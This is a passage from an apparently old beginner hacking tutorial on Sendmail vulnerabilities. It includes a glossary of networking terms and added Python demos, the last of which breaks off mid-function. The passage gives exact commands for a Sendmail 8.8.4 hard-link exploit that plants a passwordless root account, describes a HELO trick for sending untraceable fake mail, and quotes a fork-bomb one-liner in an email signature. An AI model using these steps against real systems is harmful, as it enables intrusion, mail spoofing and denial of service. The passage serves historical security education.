exact descriptions of the bug, where and when it should happen,
work-arounds (how to solve it) etc'. The only drawback of Security
Focus is that it is smaller than other databases.
BugTraq
Ah... my favorite database. When people post something to BugTraq
about a security hole they found, other people can reply to them and
share their side of the story. For example: did it work on their
computer too, how to fix the bug in various ways, what causes the
bug in the first place etc'. You can compile a full database with
all of the necessary information by simply reading a couple of
posts.
Getting Caught
If you're planning on doing something bad, please don't. You can get
caught. Better crackers than you already got caught. Don't be
stupid.
Okay, so I can hack a host which runs Sendmail. Now how do I
do it?
I have made a nice list with several security holes regarding
Sendmail just to give you the hang of it.
Bug in Sendmail's HELO Command (taken from rootshell.com)
Note: this won't get you root access(14) or get you into parts of a
system you're not supposed to get into, but this is still pretty
cool. In fact, it lets you hide your IP/hostname when faking mail!
[ http://www.rootshell.com/ ]
We've had this exploit since January but sat on it until everyone
had a chance of implementing a stable version of sendmail 8.9.x.
(And because the last thing I want to do is help the spammers) It
has now made its way to Bugtraq so without further ado.
--Rootshell 5/28/98
Date: Fri, 22 May 1998 12:36:54 +0300
From: Valentin Pavlov <root@PNS.NETBG.COM>
Subject: about sendmail 8.8.8 HELO hole
I assume this is pretty old (10 Jan 1998) but still...
I found a pretty simple way to prevent the hiding of the sender's IP
address. The method to hide the IP address of the sender is
described below. Now, if we want to keep track of such exploit
attempts, we have to compile sendmail 8.8.8 with PICKY_HELO_CHECK
defined in conf.h:
#define PICKY_HELO_CHECK 1
This will force sendmail to syslog an authentication warning
(message with LOG_INFO level) and include an
X-Authentication-Warning: header in the message, saying what host
tried to hide itself. Check out the source (srvrsmtp.c, main.c).
Also, LogLevel must be set to a value higher than 3 (default is 9)
in sendmail.cf.
regards,
capone
Make source, not [high]score
Valentin 'Val Capone' Pavlov
capone@netbg.com, UKTC87203
Now for the original message, describing the exploit:
-----Original Message-----
From: Michał Zalewski <lcamtuf@boss.staszic.waw.pl>
To: info@rootshell.com <info@rootshell.com>
Date: 10 January 1998 12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.
Here's a brief description of a Sendmail (qmail) hole I found
recently:
When someone mailbombs you, or tries to send fakemail, spam, etc -
sendmail normally attaches the sender's host name and its address
to the outgoing message:
--
>From spam@flooders.net Mon Jan 5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!!
--
That's perfect - now you know who is responsible for that annoying
junk in your mailbox: "Received: from spammer (marc@math.university.edu
[150.129.84.5])". Nothing easier...
But I found a small hole, which allows a user to hide his identity
and send mails anonymously. The only thing you should do is to
pass a HELO string longer than approx. 1024 B - the sender's
location and other very useful information will be cropped!!!
Message headers become uninteresting. Sometimes, the sender
may become quite untraceable (but not always, if it's possible
to obtain logs from the machine which has been used to send):
--
>From spam@flooders.net Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!! Now guess who I am...
--
Here's a simple example of Sendmail's HELO hole usage. Note, this
script has been written ONLY to show how easy sending fakemails and
mailbombs may be, with the cooperation of Sendmail ;) The script is
very slow and restricted in many ways, but explains the problem
well (note, some non-Berkeley daemons are also affected,
probably Qmail?):
_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
Giant Bug in Sendmail 8.8.4 (taken from hackersclub.com)
sendmail 8.8.4 exploit
"sendmail? 'tis the buggiest program" -phriend-
Ok, here's a brief and interesting explanation of this famous
exploit. This exploit uses sendmail version 8.8.4 and it requires
that you have a shell account on the server in question. The
exploit creates a link from /etc/passwd to /var/tmp/dead.letter.
Very simple really. Here's how it works, below are the exact
commands as you have to type them (for the technically challenged
ones)
* ln /etc/passwd /var/tmp/dead.letter
* telnet target.host 25
* mail from: nonexistent@not.an.actual.host.com
* rcpt to: nonexistent@not.an.actual.host.com
* data
* lord::0:0:leet shit:/root:/bin/bash
* .
* quit
Kaboom, you're done, telnet to port 23 and log in as lord, no
password required. Thanks to a little bit of work we did, lord just
happens to have the same privileges as root.
There are a couple of reasons why this might not work.
1. /var and / are different partitions (as you already know, you
can't make hard links between different partitions)
2. There is a postmaster account on the machine or a mail alias, in
which case your mail will end up there instead of being written to
/etc/passwd
3. /var/tmp doesn't exist or isn't publicly writable
Duncan Silver
www.hackersclub.com/uu
Editor's notes: lord::0:0:leet shit:/root:/bin/bash is a line out of
a Unix password file(33).
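As an added illustration of why the trick above works, and of the three reasons the post gives for it failing, here is a Python example of mine (not the original post's code): it replays the hard-link mechanics in a scratch directory with a stand-in passwd file, and turns the three preconditions into checks you can run against a real box. The directory layout and file contents are made up. On a current Linux kernel the fs.protected_hardlinks sysctl may also refuse a link to a file you cannot write, which kills the trick regardless of the other conditions, so that is checked as well.

```python
import os
import stat
import tempfile


def same_filesystem(path_a, path_b):
    """Hard links only work inside one filesystem: compare device numbers."""
    return os.stat(path_a).st_dev == os.stat(path_b).st_dev


def world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def sticky(path):
    """The sticky bit (usual on /tmp and /var/tmp) stops other users deleting
    your files; it does NOT stop anyone creating a link there."""
    return bool(os.stat(path).st_mode & stat.S_ISVTX)


def protected_hardlinks():
    """Linux 3.6+ sysctl: when 1, you may not link to a file you cannot write.
    None means the knob is not there (not Linux, or /proc not mounted)."""
    try:
        with open("/proc/sys/fs/protected_hardlinks") as f:
            return f.read().strip() == "1"
    except OSError:
        return None


def preconditions(root_fs="/", tmp_dir="/var/tmp", aliases="/etc/aliases"):
    """The failure reasons from the post, as checks against a live system."""
    result = {"tmp_exists": os.path.isdir(tmp_dir),
              "protected_hardlinks": protected_hardlinks()}
    if result["tmp_exists"]:
        result["same_filesystem"] = same_filesystem(root_fs, tmp_dir)
        result["tmp_world_writable"] = world_writable(tmp_dir)
        result["tmp_sticky"] = sticky(tmp_dir)
    try:
        with open(aliases) as f:
            result["postmaster_alias"] = any(
                line.strip().lower().startswith("postmaster:") for line in f)
    except OSError:
        result["postmaster_alias"] = None   # no aliases file to look at
    return result


def link_attack_demo(root=None):
    """Replay the mechanics in a scratch tree: etc/passwd stands in for
    /etc/passwd and var/tmp/dead.letter for the real dead.letter. Whatever the
    'mailer' appends to dead.letter lands in passwd, because after `ln` both
    names are the same inode. Returns (passwd lines, scratch root)."""
    if root is None:
        root = tempfile.mkdtemp()
    etc = os.path.join(root, "etc")
    spool = os.path.join(root, "var", "tmp")
    os.makedirs(etc)
    os.makedirs(spool)
    os.chmod(spool, 0o1777)                  # mimic a real /var/tmp
    passwd = os.path.join(etc, "passwd")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")   # constructed content
    dead = os.path.join(spool, "dead.letter")
    os.link(passwd, dead)                    # the attacker's `ln`
    assert os.stat(passwd).st_ino == os.stat(dead).st_ino
    # ...and what the mailer does when it saves an undeliverable message:
    with open(dead, "a") as f:
        f.write("lord::0:0:leet shit:/root:/bin/bash\n")
    with open(passwd) as f:
        return f.read().splitlines(), root


if __name__ == "__main__":
    print(preconditions())
    lines, root = link_attack_demo()
    print("\n".join(lines))
```

The defensive reading of the checks is the interesting one: a world-writable spool on the root filesystem, no postmaster alias and protected_hardlinks off is the configuration the post is counting on.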
Final Notes
You must have noticed that I didn't put anything from BugTraq. This
is because everything that goes to BugTraq gets at least one reply
(from my experience), and I don't feel like posting whole
threads(34) here (they're too damn long).
Newbies corner
1. Daemon - a program that listens for incoming connections on a
specific port(2). Some daemons may receive commands from you and
interact with you, others may simply spew out some text/binary and
quit.
2. Port - (for the more technical explanation of what ports are, see
the end of this explanation) ports are like holes that enable things
(data, in this case) to come into them.
There are physical ports and software ports on your computer.
Physical ports are those slots on the back of your computer, your
monitor etc'. Now, software ports are used when connecting to other
computers.
For example: I just bought a new computer and I want to turn it into
a webserver (I want to enable people to access selected web pages,
pictures, cgi and java scripts or applets, programs etc' that are
located on my computer (MY computer, not on some cheesy free webhost
such as Geocities), and I want those people to be able to do that
using nothing but a browser). In order for that to happen, I need to
install a webserver program.
The webserver program opens a port on my computer called port 80
(this number can be changed, but this is the default number). Then
it listens to incoming connections on that port.
When someone starts his Internet browser (Netscape, Lynx, Microsoft
Explorer etc') and surfs to my website, his browser connects to my
computer on port 80 and then sends HTTP commands that my webserver
program can understand into it.
My webserver program quickly picks up the incoming data and then
sends it back into a port that the surfer's browser opened on the
surfer's computer. The browser will listen on that port and wait for
the data (the HTML page, the picture, the program etc') to come in
through it.
Note about non-default ports: if you decide to put, say, a webserver
on a non-default port, it'll be harder for people to find it. If you
decided to put it on port... umm... 8000 instead of 80, people will
have to type in your IP address(9) or your hostname(10) if you have
one and add a :8000 at the end. For example: 142.30.5.79:8000. Simply
typing 142.30.5.79 into your browser's URL field is the same as
typing 142.30.5.79:80, so it's best to put a webserver on port 80
(unless you only want a specific group of people, who will be given
that number, to access your webserver; but such a hiding place is
easily found with a portscanner(12)).
There are different ports for different services(3) so data won't
mix up. Imagine your browser getting data your FTP client was
supposed to get.
I hope you got the main idea of what a port is.
Now, there are three kinds of ports: well-known ports, registered
ports and dynamic/private ports.
The well-known ports are those from 0 through 1023. These are the
default ports for many services. For example: the default port for
webservers is 80. Otherwise, how would your browser know which port
it has to connect to?
The registered ports are those from 1024 through 49151. These ports
are registered for particular programs. For example: ICQ (www.icq.com)
registers several ports for listening to various incoming events
(messages, file transfers etc') on them.
The dynamic and/or private ports are those from 49152 through 65535,
and can be used by anyone for any given purpose.
Important note about well-known ports: on Unix only root(14) can bind
a daemon to a port below 1024, so ordinary users can't start their
own daemons on important ports (or impersonate a real service there).
3. Service - a daemon(1) that allows everyone who connects to it (or
a specific group of people. For example: anyone from this IP(9)
range, everyone who knows the secret password etc') to use some kind
of service.
For example: a webserver such as the one described in section one on
this chapter (the explanation regarding what is a port) is a service
because it allows people to come in and ask for certain pieces of
data.
The simplest example of a service I can think of is
"daytime". Daytime waits for incoming connections on
port(2) 13 and when someone connects it immediately announces the
current time on the computer that runs it (with no need for you to
type in any commands or passwords or anything). Simple.
4. Daemon banner - most daemons(1) give away some technical info to
anyone who connects to them on some point. This information can be
used by anyone who connects to that daemon simply for it to know how
to interact with the daemon best (which daemon is it, what version,
etc'), but it can also be used by hackers.
Let's try connecting to port(2) 23 on someone.com (note: I've made
up this hostname(10) and all the details regarding it simply to
teach you about daemon banners. I really don't know whether there is
such a hostname and whether the details I'm about to give you are
correct). On port 23 you would usually find Telnet(19). Telnet is a
service which in most cases first asks you for a username and a
password (unless you typed in an "unpassworded"
username, in which case it will simply log you in as that user
without asking for a password) and then runs a program specified
by the sysadmin(22) and lets you work with it. In most cases you
will get into a text-based shell (a command interpreter(20)). The
catch is: you cannot necessarily do ANYTHING. It all depends on what
permissions the user you are logged in as has. The user
root(14) has all permissions (read everything, write (and delete)
everything, execute everything and change other people's
permissions).
Okay, so let's try going to port 23 on someone.com. At first we get
this:
Welcome to someone.com, running FreeBSD 4.13
Login:
Aha! Someone.com is running an operating system called FreeBSD 4.13!
That has to be worth something (we might come across a bug report
regarding a bug that exists in FreeBSD 4.13 and might enable us to
hack this server at a certain point). Every piece of information
about a server is important. Keep in mind that a banner is just text
the daemon chooses to send: a sysadmin can change or remove it, so
treat it as a hint, not as proof.
Now, since we don't know a username and a password for this server
we could either terminate the connection or try guessing. Most
servers have a guest account (username: guest, password: guest or
just username: guest) or a newuser account (username: newuser,
password: newuser, or just username: newuser), but that certainly
won't help us hack these guys... unless there's a major hole in
these accounts. You'll have to figure these things out by yourself.
Note about the words server and host: any computer on a network is a
host; a host that offers services is also called a server.
5. Timeout - okay, so I've got a daemon(1) waiting on port(2) 23 for
incoming connections. Now, what happens if someone connects to it
and does absolutely nothing? He would simply remain connected to
that daemon until one of us either reboots or closes the connection.
You don't want anyone connecting to some port on your computer and
just hanging there, do you? This would only waste valuable
bandwidth(15)!
Most people will not want to monitor their network status 24 hours a
day and disconnect everyone who decides to hang around for a while
(especially on large networks). This is why timeout was invented.
By setting a timeout value on a daemon (this can be done during the
setup process, by running a setup program or by entering some sort
of options box) you can make it close the connection on anyone who
connects to it and does nothing for longer than the timeout value.
For example: you put a daemon on port 17 and tell it to time out
after 2.5 seconds. If someone connects to your daemon and does not
type anything for 2.5 seconds, the daemon will close the connection
and that person will have to reconnect and start typing before the
daemon times out and throws him out again.
This is why webservers can get away with very short idle timeouts
(most people connect to webservers using client programs(16), and
these programs "type" really fast...).
6. TCP - stands for Transmission Control Protocol. TCP is a protocol
that is used for transferring data through networks (the Internet,
local networks etc'). TCP is much more reliable than UDP since it
uses several precautions, such as sequence numbers, acknowledgements,
retransmission and all sorts of nifty header flags (see the excellent
article called 'IP Spoofing Demystified' at the Books Section in
http://blacksun.box.sk for lots of info regarding TCP (a real MUST
READ!!)).
TCP's only disadvantage is that it is a bit slower than UDP (the
reliability costs extra packets and round trips), but it is more
reliable, hence it is used to transfer files where every bit matters
(such as programs - if you lose a single bit of the file, the whole
thing is useless).
7. UDP - stands for User Datagram Protocol. UDP is a protocol that
is used for transferring data through networks (the Internet, local
networks etc'). UDP is less reliable than TCP (see the excellent
article called 'IP Spoofing Demystified' at the Books Section in
http://blacksun.box.sk for lots of info regarding UDP (a real MUST
READ!!)), but it is also a little faster, hence programs such as
Real Player (see http://www.real.com) use it for streaming video and
more, where losing a single packet(32) or two is not such a big
deal.
8. ICMP - stands for Internet Control Message Protocol. A protocol
used for control and error messages on a network (the Internet,
local networks etc'): host unreachable, time exceeded, the echo
request and reply that ping uses, and so on.
9. IP address - every computer connected to the Internet has an IP
address. If another computer wants to interact with your computer it
will need your IP, just like you need another person's phone number
to call him.
IP addresses look like this: x.x.x.x, where each x is a number
between 0 and 255.
Note: there are "special" IP addresses which aren't use to
connect to other computers. For example: 127.0.0.1 means localhost,
which means you (your computer). Connecting to a certain port(2) on
the IP 127.0.0.1 will connect to that port on your computer.
Oh, by the way, IP stands for Internet Protocol(18).
10. Hostname - hey, guess what! I just found out this really cool
site! But I can't remember it's IP address, and when I do, I hate
typing in these long IP addresses(9). Sure, I can bookmark it, but
what if I'll want to tell my friends about it? Or what if I'll be
surfing from my friend's house or from a public place and I won't
have my bookmarks?
The answer to all of these questions is hostnames.
Hostnames are aliases to IP addresses. The mapping from names to
addresses is kept in the Domain Name System: InterNIC was the
registry where domain names were registered, and the top of the
system is a small set of root name servers.
When you type in a hostname, your computer looks up that hostname,
finds the appropriate IP address and then connects to it.
But imagine that the entire world asked InterNIC or the root servers
directly. This would surely overload their servers, they would have
to spend money on constant upgrades and backups, and think what would
happen if something bad happened to their databases... The solution
to this problem is called DNS servers(17).
11. Finding out what your ISP's mail servers are - there are several
ways to do this:
1) Call your ISP and ask them what is the IP address(9) or the
hostname(10) of your outgoing mail server (this is the IP/hostname
you will need to perform all the tricks in this tutorial). If you
want to know a different ISP's mail server, call their tech support
phone number. But what if they're on the other side of the world and
you don't feel like spending tons of cash simply for calling them
and being put on hold? In this case, try method 3.
2) Start up your mail client, go to your preferences page and find
what it says in the 'outgoing mail' field or in the 'SMTP server'
field (both are the same. SMTP stands for Simple Mail Transfer
Protocol, which is a protocol(18) that is used to send Emails over
the Internet).
3) Asking DNS, or guessing. The proper way is to look up the
domain's MX (mail exchanger) record (nslookup -type=mx someone.com
will do it); the hosts it returns are the ones that accept mail for
that domain, and you can connect to them on port(2) 25. Failing that,
guess: if your target server is someone.com, their mail server
should either be mailgw.someone.com:25 (mailgw.someone.com on
port 25. Note: mailgw stands for mail gateway) or someone.com:25.
If not, send an Email to admin@someone.com or support@someone.com
and ask them what their mail server is (they should be happy to
answer you, unless you tell them that you're an evil hacker or
something. In that case they'll call the cops on you).
Note: not every server on the planet has an outgoing mail server.
12. Portscanner - a program that scans a target for open ports(2) by
trying to connect to it on various ports. The simplest portscanner
starts at port 1 and climbs up, but you can tell more advanced
portscanners to scan a specific range, give you some info on open
ports they might find etc'.
13. Services scanner - a services scanner is much more sophisticated
than a portscanner(12) since it tries to connect on predefined ports
which should have the service(3) you're looking for on them.
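Items 1 through 5 and 12 through 13 describe both sides of the same thing: a daemon that listens on a port, greets whoever connects with a banner and drops idle clients after a timeout, and a scanner that walks a range of ports, notes which ones answer and reads their banners. The block below is an added example (not code from the original article or from any tool it mentions) that puts both sides together on 127.0.0.1. The banner text is the made-up someone.com greeting from item 4; the port is whatever the kernel hands out, so it lands in the registered or dynamic range rather than on a well-known one, which is what item 2 says an unprivileged user gets.

```python
import socket
import threading
from typing import Dict, Optional, Tuple

# Banner borrowed from the made-up someone.com example in item 4.
BANNER = b"Welcome to someone.com, running FreeBSD 4.13\r\nLogin: "
WELL_KNOWN_END, REGISTERED_END = 1024, 49152


def port_class(port: int) -> str:
    """The three IANA port ranges listed in item 2."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range")
    if port < WELL_KNOWN_END:
        return "well-known"
    if port < REGISTERED_END:
        return "registered"
    return "dynamic/private"


def fake_daemon(idle_timeout: float = 1.0) -> Tuple[socket.socket, int]:
    """Listen on a free port on 127.0.0.1, send BANNER to each client and
    drop it if it sends nothing within idle_timeout seconds (item 5).
    Returns the listening socket (close it to stop) and the chosen port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # port 0: the kernel picks a free high port
    srv.listen(5)

    def handle(conn: socket.socket) -> None:
        with conn:
            try:
                conn.sendall(BANNER)
                conn.settimeout(idle_timeout)
                conn.recv(1024)      # wait for a "login"; timeout -> drop client
            except socket.timeout:
                try:
                    conn.sendall(b"\r\nTimed out.\r\n")
                except OSError:
                    pass
            except OSError:
                pass

    def accept_loop() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return               # listening socket was closed
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def grab_banner(host: str, port: int, timeout: float = 1.0) -> Optional[bytes]:
    """Connect and read whatever the daemon says first (item 4).
    None: the port is closed (refused or unreachable within the timeout).
    b'':  the port is open but the daemon said nothing in time."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(1024)
            except socket.timeout:
                return b""
    except OSError:
        return None


def scan(host: str, first: int, last: int, timeout: float = 0.3) -> Dict[int, bytes]:
    """The simplest connect() portscanner from item 12: try every port in
    the range and keep the open ones together with their banners."""
    found: Dict[int, bytes] = {}
    for port in range(first, last + 1):
        banner = grab_banner(host, port, timeout)
        if banner is not None:
            found[port] = banner
    return found


if __name__ == "__main__":
    srv, port = fake_daemon()
    print("fake daemon on port %d (%s range)" % (port, port_class(port)))
    for p, b in scan("127.0.0.1", port - 2, port + 2).items():
        print("%5d open: %r" % (p, b))
    srv.close()
```

A services scanner (item 13) is the same loop run over a fixed list of ports (21, 23, 25, 80 ...) instead of a range, keyed by the banner it expects to read on each.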
14. Root - an account on Unix computers which has maximum
privileges (read any file, write (and delete) any file, execute
any file and change other users' permissions). Note: other accounts
may have root access (any account with UID 0 does, see (33)), and the
account named root may not always have it, depending on the
sysadmin(22) (but root is the default account for root access).
15. Bandwidth - the maximum rate at which a network connection
device (a modem, a network card, a mail pigeon etc') can move data.
For example: I just bought a new modem. It has a bandwidth of 100 KB
per second, meaning it can transfer up to 100 KB per second.
When you use your network device to do something it will use up some
of the bandwidth in order to do that operation.
16. Client program - a program that connects to a certain
service(3). Most client programs would know how to communicate with
that service with or without the information it will receive from
the daemon banner(4).
Example: an Internet browser (such as Netscape) is a client program
because it connects to port(2) 80, where the webserver daemon(1) is
waiting for connections, and interacts with it in order to retrieve
the file you're looking for. A browser has to know how to
communicate with the webserver daemon (also referred to as HTTPD,
HTTP Daemon. HTTP stands for Hyper Text(23) Transfer Protocol) in
order to fulfill your requests.
17. DNS server - a server that stores hostnames(10) and their IP
addresses(9). Instead of having InterNIC's servers handle the
entire planet, every ISP has a DNS server.
When you type in a hostname and tell your modem to connect to it,
your computer performs an action called 'DNS lookup'. In other
words, it asks your ISP's DNS server what the appropriate IP
address for the hostname you've typed in is. If your ISP's DNS server
does not know the answer, it asks a higher-level DNS server. If
the higher-level DNS server does not know the answer, it asks an
even higher-level DNS server, etc' etc' etc'. The highest level is
the set of root name servers.
If the DNS server knew the IP in the first place it gives it to
you. If it didn't (and it only found it out after querying other
servers), it first adds it to its own cache and then gives it to
you.
18. Protocol - a set of rules computers use to interact with each
other over a network of some sort (such as the Internet or some kind
of local network). Both computers need to know a common protocol,
and each has to assume that the other one knows this protocol and
uses it.
19. Telnet - a program that at its simplest allows you to form a
text-based connection between your computer and another computer
over a network of some sort. You may choose the IP address(9) or
hostname(10) and the port(2) you wish to contact, and Telnet will
establish a TCP(6) connection between both machines.
Note about the Telnet daemon(1): the Telnet daemon is completely
different. It waits for incoming TCP(6) connections on port 23
(Telnet is TCP only; there is no UDP(7) variant) and then asks the
user for a login (often called a username) and a password (unless
the user typed in an unpassworded username. In that case, he will
get in without entering a password. Unpassworded accounts are often
VERY limited) and then proceeds to execute a program (usually a
command interpreter(20)) and gives you some permissions, all
depending on the username and the password you have entered (unless
you gave the wrong details. In that case, you will be told that
either the username or the password is wrong and be given another
try. Most systems give you three tries and then disconnect).
20. Command interpreter - a program that accepts commands from the
user and turns them into real commands your computer understands.
For example: if your command interpreter contains a command called,
say, display, which accepts a single parameter which should be a
filename, and you type in 'display somefile' (without the quotes,
and replace somefile with a real filename) then it will translate
this command into 'okay mr. computer, find the hard drive by doing
this and this, go to the FAT (File Allocation Table) and find out in
which sector/sectors this file is located, grab the file and send it
to the terminal device (the specified output device, usually your
monitor)'. Get the main idea?
21. Shell account - an account on a remote computer (a username and
a password and a bunch of personal configuration files and stuff).
Having a shell account on a remote computer means having the ability
to telnet(19) into that computer on port 23, type in your account's
login (also referred to as a username) and password and getting a
command interpreter(20) with some permissions (depending on the
sysadmin(22)).
22. Sysadmin / admin - the man/woman/furry creature who is in charge
of a system.
23. Hyper Text - if you've ever seen an HTML document you should
know what hyper text is, but you might not be aware of it. HTML
stands for Hyper Text Markup Language. Hyper text is considered as
"enhanced text", since you can add pictures, colors, links
etc' to it. Compare that to the regular and dull text format which
this tutorial uses... :D
24. RFC - stands for Request For Comments. These are the documents
published by the IETF (Internet Engineering Task Force - those guys
who set all those Internet standards and stuff). Some are
informational or experimental, others are the actual Internet
standards (SMTP, TCP, IP and so on are each defined in an RFC).
You can search for RFCs at http://www.linuxberg.com.
25. InterNIC - the domain registration database. The DNS(17) itself
tops out at the root name servers, which know where to find the
servers for every top-level domain.
26. Sub domain - first class domains look like this: something.com
(or other extensions, such as org, net, cc, co.uk etc'). It costs
70$ to register one (see http://www.networksolutions.com). Second
class domains look like this: someone.something.com and they cost 0$
to register, if you already have something.com registered to you, of
course (although you can get those for free on websites such as
www.anrki.com). Third class domains look like this:
blah.someone.something.com and they don't cost any money either,
etc' etc' etc'.
Note about the price of a first-class domain: this price does not
include web hosting (someone who will host your website or whatever
you want to put up on his server).
27. SSH - stands for Secure Shell. This daemon(1) waits for incoming
TCP(6) connections on port 22 (like Telnet, it is TCP only). Once you
connect to it, you will be asked for a login and a password, just
like the Telnet daemon(19) does, only SSH encrypts everything
(including the password) for increased security.
28. Moderated mailing list / message board - I'll explain this by
giving you an example. BugTraq (see http://www.securityfocus.com) is
one of the best security-related mailing lists. Although people can
"send things to the list" (meaning send an Email message
and have it sent to all the members of the mailing list), you can't
just send everything. Aleph1, the moderator, goes through all
incoming messages and posts only the good ones.
The same goes for moderated message boards, etc'.
29. DoS attack - DoS stands for Denial of Service (also referred to
as a "nuke" or a "newk"). A DoS attack is some
kind of an attack that causes the target computer to deny some/all
kinds of services to the users of that computer (local and/or remote
users).
For example: Winnuke (also known as OOB), the simplest DoS in the
world.
(Taken from Spikeman's DoS site) This denial of service program
affects Windows clients by sending an "Out of Band"
exception message to port 139, which does not know how to handle it.
This is a standard listening port on Windows operating systems.
Users of Win 3.11, Win95, and Win NT are vulnerable to this attack.
This program is basically a nuisance program, but it is being widely
circulated over the internet now. It has become a bother in chatrooms
and on IRC. By using your IP# and sending OOB data to port 139,
malicious users can disconnect you from
the net, often leaving you with low resources and the blue tinted
screen. Some of you may have been victims already. If this happens
to you on Win 95, you will see a Windows fatal error message similar
to the following:
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.
This was called from 0028: in VxD NDIS(01) + 00000D7C.
Rebooting the comp should return it to normal state.
Patches ("fixes") For WinNuke (OOB)
Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp
Windows 95 Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe
(for Winsock 2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to 95 patches before installing.
Which version of Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html
Windows NT 4.0 Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to Windows NT patches before installing.
More info on DoS attacks can be found at Spikeman's DoS site:
http://www.genocide2600.com/~spikeman/main.html
* I really don't know if this patch will work on newer versions of
Winsock. Therefore I'd like to recommend that you will first
downgrade to Winsock 1.1 (the one that comes with Windows 95) by
going to Control Panel, Network and removing TCP/IP and Dial Up
Adapter(30) and then re-adding them by clicking add, choose protocol
and in the company frame choose Microsoft. Then look for an option
called TCP/IP and double-click it. As for DUN (Dial Up Networking),
do the same but choose adapter instead of protocol.
After you finish downgrading re-upgrade to Winsock 2.0, apply the
patch (Vipup20.exe) and then upgrade to newer versions of Winsock.
30. DUN - stands for Dial-Up Networking. DUN is the program that
comes with Windows and dials your ISP in case you have a dial-up
account(31).
31. Dial-Up account - a dial-up account at an ISP means that your
modem has to dial some phone number before you can get on the net.
Unlike other ISP accounts (direct cables which keep you online for
24 hours a day), you get a dynamic IP address(9) (and not a static
one like on direct cable connections) since you have to connect and
disconnect instead of just staying online all the time. Every time
you re-connect you are usually assigned a different IP address.
32. Packet - a piece of data that travels over a network (such as
the Internet or local/wide area networks). A packet consists of two
main parts: the header and the data itself. The header contains all
sorts of nifty values such as the TTL (Time To Live) and more (you
can read about those in the Modem Speedup section at http://blacksun.box.sk).
The data part contains the actual data that the packet is carrying.
On a regular dial-up account(31), the maximum size of a packet (the
MTU) is typically 576 bytes (including the header), but on direct
cable connections a packet can be much bigger (again, see the Modem
Speedup section at blacksun.box.sk).
33. Unix password files - Every Unix system has a password file.
They contain a list of users, their passwords and some important
information about them. The password file is located at /etc/passwd.
Each line represents a user.
Each line consists of 7 fields, separated by colons (:).
A line in a password file should look like this:
Username:encrypted password:UID:GID:short description:home
directory:shell
Username - the user's username.
Encrypted password - the user's password, stored as a one-way hash
rather than in the clear. With the traditional Unix crypt() function
the hash is always 13 characters long. Modern systems keep the hash
in /etc/shadow (readable only by root) and put just an x in this
field of /etc/passwd, and newer hash formats ($1$, $5$, $6$ ...) are
longer than 13 characters.
UID - User ID. Each user has an ID number. If your UID is 0 it means
you have root access(14).
GID - Group ID. You can set groups (for example: all the workers in
the accounting division) and set special permissions to that entire
group. Root has GID 0.
Short description - short description in human language.
Home directory - the directory where all of the user's personal
configuration files are held.
Shell - a program that is executed once the user logs in. In most
cases (and in this case too) the shell is a command interpreter(20).
In our case, the encrypted password field is empty, which means that
the user gets to log in by simply giving a username. This can be
changed after we log in by typing passwd at the command interpreter.
You will then be asked for a password to set for your account.
Note: on some systems, you have to type passwd your-username instead
of simply typing passwd.
Note 2: root can do passwd your-username and change your-username's
password, no matter who your-username is.
Note 3: if you put any characters in this field that are not from
the set '. / 0-9 a-z A-Z' (without the quotes), for example a single
* or !, no password can ever hash to that value, so the account is
effectively disabled and that user cannot log in. This is used when
you know you might want to enable the account again in the future.
Leaving the field empty is the opposite: no password at all.
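The following is an added example (not part of the original article) that reads password-file lines the way this item describes them and reports what the hard-link trick earlier on this page, and any sysadmin checking up on it, would care about: entries with an empty password field and entries other than root with UID 0. The sample file is constructed for the example; the lord line in it is the one the exploit appends, alice has a made-up 13-character DES crypt hash, and the last line is deliberately short one field to show how a malformed line is reported rather than dropped.

```python
from typing import Dict, List

# Constructed sample /etc/passwd. 'lord' is the line the hard-link trick
# appends; 'alice' carries a made-up 13-character DES crypt hash; the last
# line is deliberately missing its shell field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:Nq1mJ4pSb7YrM:1000:1000:Alice:/home/alice:/bin/bash
guest::1001:1001:Guest account:/home/guest:/bin/sh
lord::0:0:leet shit:/root:/bin/bash
broken:x:1002:1002:missing shell field:/home/broken
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
CRYPT_CHARS = set("./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split every non-empty line into the 7 colon-separated fields.
    A line with the wrong number of fields is returned with an 'error'
    key instead of being silently skipped."""
    entries: List[Dict[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
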